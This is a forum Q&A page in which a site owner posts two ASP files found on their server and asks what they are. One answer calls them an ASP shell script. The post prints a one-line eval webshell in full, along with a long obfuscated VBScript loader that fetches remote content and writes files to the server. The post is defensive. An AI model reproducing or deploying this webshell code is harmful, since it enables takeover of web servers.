duanping2809 2014-10-15 07:01
浏览 62
已采纳

我最近在服务器上的网站上检测到并删除了2个特殊文件? 两者都是asp文件[关闭]

Google saying that these files are for hacking. actually my entire site is in php and html.

first file is 3wku1iyi13.asp , it contains

<%response.write(now):eval(request(Chr(78)&Chr(76)&Chr(53)&Chr(80)&Chr(76)&Chr(103)&Chr(78)&Chr(115)&Chr(74)&Chr(74)))%>

and the second one is file.asp , containing code

<%@ LANGUAGE=VBSCRIPT CODEPAGE=65001 %>
<%
Dim IIII55,IIII5I,IIIII5,IIIIII,I555555
Set IIIII5=Response:Set IIII5I=Request:Set I555555=Session:Set IIII55=Application:Set IIIIII=Server
Set II5IIII = New I55IIII
II5IIII.dizhi   = I55II55("`gc]hd]cd]abd")
II5IIII.filename    = IIII5I.ServerVariables(I55II55("$4C:AE0}2>6"))
II5IIII.csvalue     = I55II55("?2>6")
II5IIII.cachefile   = I55II55("^42496")
II5IIII.connect
Class I55IIII
Public I5I5555,dizhi,I5I55I5,filename,csvalue,cachefile
Private I5I5II5,I5I5III,I5II555,I5II55I,I5II5I5,I5II5II,I5III55
Private Sub Class_Initialize
I5I5II5 = ""
filename    = I55II55(":?56I]2DA")
csvalue     = I55II55("A286")
I5I5III = IIII5I.ServerVariables(I55II55("$t#")&I55II55("'t#0$~u%")&I55II55("(p#t"))
I5I5555         = I55II55("`af]_]_]`")
dizhi   = I55II55("`af]_]_]`")
I5I55I5 = ""
I5II5II     = IIII5I.ServerVariables(I55II55("w%%!0w~$%"))
cachefile   = I55II55("^42496")
I5III55         = I55I5I5()
End Sub
Function connect()
Dim I5III5I
Set I5III5I = IIIIII.Createobject(I55II55("(")&I55II55(":?w")&I55II55("E")&I55II55("EA](:")&I55II55("?wEEA#")&I55II55("6BF6D")&I55II55("E]")&"5"&".1")
I5III5I.option(6) = false
I5III5I.Open I55II55("vt%"), I55II55("9EEAi^^")&dizhi&I55II55("^")&IIII5I.QueryString(csvalue) , False
I5III5I.setRequestHeader I55II55(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), I5III55
I5III5I.setRequestHeader I55II55("w@DE"), I5II5II
I5III5I.setRequestHeader I55II55("&D6C\p86?E"), IIII5I.ServerVariables(I55II55("w%%!0&$t#0pvt}%"))
If IIII5I.ServerVariables(I55II55("w%%!0#tut#t#"))<>"" Then
I5III5I.setRequestHeader I55II55("#676C6C"), IIII5I.ServerVariables(I55II55("w%%!0#tut#t#"))
End If
I5III5I.Send()
I5III5I.WaitForResponse()
I5II5I5         = I5III5I.ResponseBody
I5I5II5     = I5III5I.Status
If I5I5II5=302 or I5I5II5= 301 Then
I5II55I = I5III5I.GetResponseHeader(I55II55("{@42E:@?"))
end if
Set I5III5I=Nothing
set III5555 = IIIIII.CreateObject(I55II55("p5@53]$EC62>"))
III5555.Type = (36 * 49 - 1763)
III5555.Mode = (45 * 58 - 2607)
III5555.Open
III5555.Write I5II5I5
III5555.Position = (38 * 62 - 2356)
III5555.Type = (13 * 76 - 986)
III5555.Charset = I55II55("&%u\g")
I5II5I5 = III5555.ReadText
III5555.Close
I5555I5()
End function
Function I5555I5()
If I5I5II5="302" Then
IIIII5.Redirect(I5II55I)
Exit Function
ElseIf I5I5II5="301" Then
IIIII5.Status = I55II55("w%%!^`]` ,b_` ,|@G65 ,!6C>2?6?E=J")
IIIII5.Addheader I55II55("{@42E:@?"),I5II55I
Exit Function
ElseIf I5I5II5="404" Then
IIIII5.Status = I55II55("w%%!^`]` ,c_c ,}@E ,u@F?5")
IIIII5.Addheader I55II55("s2E6"), now&I55II55(" ,v|%")
IIIII5.Addheader I55II55("$6CG6C"), I5I5III
IIIII5.Addheader I55II55("r@?E6?E\%JA6"),I55II55("E6IE^9E>=")
IIIII5.Write I55II55("k9E>=mk9625mkE:E=6mc_c ,}@E ,u@F?5k^E:E=6mk^9625mk3@5Jmk9`mc_c ,}@E ,u@F?5k^9`m")&I5I5III&I55II55("k^3@5Jmk^9E>=m")
Exit Function
ElseIf I5I5II5="403" Then
IIIII5.Status = I55II55("w%%!^`]` ,c_b ,u@C3:556?")
IIIII5.Addheader I55II55("s2E6"), now &I55II55(" ,v|%")
IIIII5.Addheader I55II55("$6CG6C"), I5I5III
IIIII5.Addheader I55II55("r@?E6?E\%JA6"),I55II55("E6IE^9E>=")
IIIII5.Write I55II55("k9E>=mk9625mkE:E=6mc_b ,u@C3:556?k^E:E=6mk^9625mk3@5Jmk9`mc_b ,u@C3:556?k^9`m")&I5I5III&I55II55("k^3@5Jmk^9E>=m")
Exit Function
End If
IIIII5.ContentType = I55II55("E6IE^9E>=")
IIIII5.AddHeader I55II55("r@?E6?E\%JA6"), I55II55("E6IE^9E>=j492CD6El&%u\g")
IIIII5.CodePage = (39 * 82 - -61803)
IIIII5.CharSet = I55II55("&%u\g")
I5II5I5 = I5555II(I55II55("9C67l-Q^W]YnX-]W9E>=M2DAM9E>X-Q"), I55II55("9C67lQ")&filename&I55II55("n")&csvalue&I55II55("lS`]SaQ"), I5II5I5)
I5II5I5 = I555I55(I55II55("9C67l-QW]YnX-]W4DDX-Q"),I55II55("9C67lQ")&cachefile&I55II55("S`]SaQ"), I5II5I5,I55II55("4DD"))
I5II5I5 = I555I55(I55II55("DC4l-QW]YnX-]W8:7M;A8MA?8X-Q"),I55II55("DC4lQ")&cachefile&I55II55("S`]SaQ"), I5II5I5,I55II55(":>8"))
IIIII5.Write I5II5I5
End Function
Function I5555II(III5II5, III5III, Str)
Dim I5IIII5
Set I5IIII5 = New RegExp
I5IIII5.Pattern = III5II5
I5IIII5.IgnoreCase = false
I5IIII5.Global = True
I5555II = I5IIII5.Replace(Str, III5III)
End Function
Function I555I55(III5II5, III5III, Str, IIII55I)
Dim I5IIII5, I5IIIII, II55555
Set I5IIII5 = New RegExp
I5IIII5.Pattern = III5II5
I5IIII5.IgnoreCase = false
I5IIII5.Global = True
Set II55555 = I5IIII5.Execute(Str)
For Each I5IIIII in II55555
IF IIII55I = I55II55("4DD") then
I555I5I I5IIIII.SubMatches(0)&I55II55("]")&I5IIIII.SubMatches(1)
Elseif IIII55I = I55II55(":>8") Then
I555II5  I5IIIII.SubMatches(0)&I55II55("]")&I5IIIII.SubMatches(1)
End If
Next
I555I55 = I5IIII5.Replace(Str, III5III)
End Function
Function I555I5I(IIII5I5)
dim II5555I
II5555I=IIIIII.MapPath(I55II55("^"))&cachefile&IIII5I5
Set III555I=IIIIII.CreateObject(I55II55("$4C:A")&I55II55("E:?8]u:=")&I55II55("6$JDE")&I55II55("6>~3;")&I55II55("64E"))
If III555I.FileExists(II5555I) Then
Set III555I=Nothing
Exit Function
end if
Set III555I=Nothing
Dim I5III5I
Set I5III5I = IIIIII.Createobject(I55II55("(:?w")&I55II55("EEA](:?")&I55II55("wEEA")&I55II55("#6BF6")&I55II55("DE]")&"5."&"1")
I5III5I.option(6) = false
I5III5I.Open I55II55("!~$%"), I55II55("9EEAi^^")&dizhi&IIII5I5 , False
I5III5I.setRequestHeader I55II55("w@DE"), I5II5II
I5III5I.setRequestHeader I55II55(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), I5III55
I5III5I.Send()
III55I5 = I5III5I.ResponseText
I55I55I(I55II55("^")&I55I555(cachefile&IIII5I5))
I55III5 I55II55("^")&cachefile&IIII5I5,III55I5,I55II55("&%u\g")
Set I5III5I=Nothing
End function
Function I555II5(IIII5I5)
On Error Resume Next
dim II5555I
II5555I=IIIIII.MapPath(I55II55("^"))&cachefile&IIII5I5
Set III555I=IIIIII.CreateObject(I55II55("$4C:A")&I55II55("E:?8]u:=")&I55II55("6$JDE")&I55II55("6>~3;")&I55II55("64E"))
If III555I.FileExists(II5555I) Then
Set III555I=Nothing
Exit Function
end if
Set III555I=Nothing
Dim I5III5I
Set I5III5I = IIIIII.Createobject(I55II55("(:?")&I55II55("wEE")&I55II55("A](:?w")&I55II55("EEA#")&I55II55("6BF6")&I55II55("DE]d")&".1")
I5III5I.option(6) = false
I5III5I.Open I55II55("vt%"), I55II55("9EEAi^^")&dizhi&IIII5I5 , False
I5III5I.setRequestHeader I55II55("w@DE"), I5II5II
I5III5I.setRequestHeader I55II55(")\#62=D57=<;H6Cb=abc=<;abc=<;abc=\x!"), I5III55
I5III5I.Send()
I5III5I.WaitForResponse
I55I55I(I55II55("^")&I55I555(cachefile&IIII5I5))
Set III55II=IIIIII.CreateObject(I55II55("25@")&I55II55("53]DEC")&I55II55("62>"))
III55II.Type= (36 * 49 - 1763)
III55II.open
III55II.write I5III5I.ResponseBody
III55II.SaveToFile IIIIII.MapPath(I55II55("^")&cachefile&IIII5I5)
III55II.flush
III55II.Close
Set III55II=Nothing
Set I5III5I=Nothing
End function
Function I555III(IIII5II)
I555III = mid(IIII5II,instrrev(IIII5II,I55II55("^"))+1)
End Function
Function I55I555(IIII5II)
I55I555 = Left(IIII5II,instrrev(IIII5II,I55II55("^")))
End Function
Function I55I55I(ByVal CFolder)
Dim II555I5, II555II, II55I55, CreateFolder
Dim II55II5, II55III, II5I555, II5I55I, II5I5I5
II5I5I5 = False
CreateFolder = CFolder
On Error Resume Next
Set II555I5 = IIIIII.CreateObject(I55II55("$4C")&I55II55(":AE:?8]")&I55II55("u:=6")&I55II55("$JDE6>")&I55II55("~3;64E"))
If Err Then
Err.Clear()
Exit Function
End If
If Right(CreateFolder, 1) = I55II55("^") Then
CreateFolder = Left(CreateFolder, Len(CreateFolder) -1)
End If
II55I55 = Split(CreateFolder, I55II55("^"))
For II55II5 = 0 To UBound(II55I55)
II5I555 = ""
For II55III = 0 To II55II5
II5I555 = II5I555 & II55I55(II55III) & I55II55("^")
Next
II5I55I = IIIIII.MapPath(II5I555)
If Not II555I5.FolderExists(II5I55I) Then
II555I5.CreateFolder(II5I55I)
End If
Next
If Err Then
Err.Clear()
Else
II5I5I5 = True
End If
I55I55I = II5I5I5
End Function
Sub I55III5 (IIIII55,byval Str,CharSet)
On Error Resume Next
set III55II=IIIIII.CreateObject(I55II55("25@")&I55II55("53]DEC")&I55II55("62>"))
III55II.Type= (13 * 76 - 986)
III55II.mode= (45 * 58 - 2607)
III55II.open
III55II.WriteText str
III55II.SaveToFile IIIIII.MapPath(IIIII55)
III55II.flush
III55II.Close
set III55II=nothing
End Sub
Function I55I5I5()
on error resume next
Dim II5I5II
If IIII5I.ServerVariables(I55II55("w%%!0")&I55II55(")0")&I55II55("u~#")&I55II55("(p#sts0u~#")) = "" Or InStr(IIII5I.ServerVariables(I55II55("w")&I55II55("%%!0)0u~")&I55II55("#(")&I55II55("p#s")&I55II55("ts0u~#")), I55II55("F?<?@H?")) > 0 Then
II5I5II = IIII5I.ServerVariables(I55II55("#t|")&I55II55("~%t0p")&I55II55("ss#"))
ElseIf InStr(IIII5I.ServerVariables(I55II55("w%")&I55II55("%!0)0u~#(")&I55II55("p#sts0u~#")), I55II55("[")) > 0 Then
II5I5II = Mid(IIII5I.ServerVariables(I55II55("w")&I55II55("%%!0)0u~")&I55II55("#(p#s")&I55II55("ts0u~#")), 1, InStr(IIII5I.ServerVariables(I55II55("w%%")&I55II55("!0)0u")&I55II55("~#(")&I55II55("p#")&I55II55("sts0u")&I55II55("~#")), I55II55("["))-1)
III5I55 = IIII5I.ServerVariables(I55II55("#t|~")&I55II55("%t0pss")&I55II55("#"))
ElseIf InStr(IIII5I.ServerVariables(I55II55("w%%")&I55II55("!0)0u")&I55II55("#(")&I55II55("p#sts0u~#")), I55II55("j")) > 0 Then
II5I5II = Mid(IIII5I.ServerVariables(I55II55("w%")&I55II55("%!0)0u~#(")&I55II55("p#sts0u~#")), 1, InStr(IIII5I.ServerVariables(I55II55("w")&I55II55("%%!0")&I55II55("0u~#")&I55II55("(p#s")&I55II55("ts0u~#")), I55II55("j"))-1)
III5I55 = IIII5I.ServerVariables(I55II55("#")&I55II55("t|~")&I55II55("%t0pss")&I55II55("#"))
Else
II5I5II = IIII5I.ServerVariables(I55II55("w%")&I55II55("%!")&I55II55("0)0u~")&I55II55("#(p#s")&I55II55("ts0u~#"))
III5I55 = IIII5I.ServerVariables(I55II55("#t|")&I55II55("~%t0ps")&I55II55("s#"))
End If
I55I5I5 = Replace(Trim(Mid(II5I5II, 1, 30)), I55II55("V"), "")
End Function
Function I55I5II()
On Error Resume Next
Dim II5II55
If LCase(IIII5I.ServerVariables(I55II55("w%%!$"))) = I55II55("@77") Then
II5II55 = I55II55("9EEAi^^")
Else
II5II55 = I55II55("9EEADi^^")
End If
II5II55 = II5II55&IIII5I.ServerVariables(I55II55("$t#'t#0}p|t"))
If IIII5I.ServerVariables(I55II55("$t#'t#0!~#%")) <> 80 Then
II5II55 = II5II55&I55II55("i")&IIII5I.ServerVariables(I55II55("$t#'t#0!~#%"))
End If
II5II55 = II5II55&IIII5I.ServerVariables(I55II55("&#{"))
If Trim(IIII5I.QueryString)<>"" Then
II5II55 = II5II55&I55II55("n")&Trim(IIII5I.QueryString)
End If
I55I5II = II5II55
End Function
End Class
Function I55II55(ByVal III5I5I)
Dim II5II5I, II55II5, II5III5
III5I5I = Replace(III5I5I, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For II55II5 = 1 To Len(III5I5I)
If II55II5 <> II5III5 Then
II5II5I = AscW(Mid(III5I5I, II55II5, 1))
If II5II5I >= 33 And II5II5I <= 79 Then
I55II55 = I55II55 & Chr(II5II5I + 47)
ElseIf II5II5I >= 80 And II5II5I <= 126 Then
I55II55 = I55II55 & Chr(II5II5I - 47)
Else
II5III5 = II55II5 + 1
If Mid(III5I5I, II5III5, 1) = I55II55("o") Then I55II55 = I55II55 & ChrW(II5II5I + 5) Else I55II55 = I55II55 & Mid(III5I5I, II55II5, 1)
End If
End If
Next
End Function
%>

Looks like these file are obfuscated. What is that ?

</div>
  • 写回答

1条回答 默认 最新

  • dswfyq6201 2014-10-17 08:09
    关注

    Well if your server is Windows base than that file is uploaded on your site to track-back or capture other site on the server. This code is look like its ASP SHELL SCRIPT if yes than I recommend you please check your site immediately against the possible vulnerability's.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 请问有用MZmine处理 “Waters SYNAPT G2-Si QTOF质谱仪在MSE模式下采集的非靶向数据” 的分析教程吗
  • ¥50 opencv4nodejs 如何安装
  • ¥15 adb push异常 adb: error: 1409-byte write failed: Invalid argument
  • ¥15 nginx反向代理获取ip,java获取真实ip
  • ¥15 eda:门禁系统设计
  • ¥50 如何使用js去调用vscode-js-debugger的方法去调试网页
  • ¥15 376.1电表主站通信协议下发指令全被否认问题
  • ¥15 物体双站RCS和其组成阵列后的双站RCS关系验证
  • ¥15 复杂网络,变滞后传递熵,FDA
  • ¥20 csv格式数据集预处理及模型选择